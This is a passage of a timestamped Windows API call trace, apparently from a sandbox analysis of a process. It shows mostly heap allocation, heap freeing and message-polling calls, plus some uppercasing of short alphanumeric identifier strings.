phProv=0x8befe0*=0xaa3868) returned 1 [0188.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.298] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.298] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.299] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0188.299] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.299] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0188.299] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.299] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.299] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.299] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.300] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.300] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.300] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.300] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.300] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.300] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.300] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.300] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.300] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0188.301] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0188.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.301] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0188.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.302] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.302] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.303] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.303] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.303] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.303] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.303] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.303] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.303] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.303] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.304] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.304] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.304] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.304] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.304] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.304] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.304] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.305] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.305] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.305] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.305] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.305] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.305] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.306] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.306] 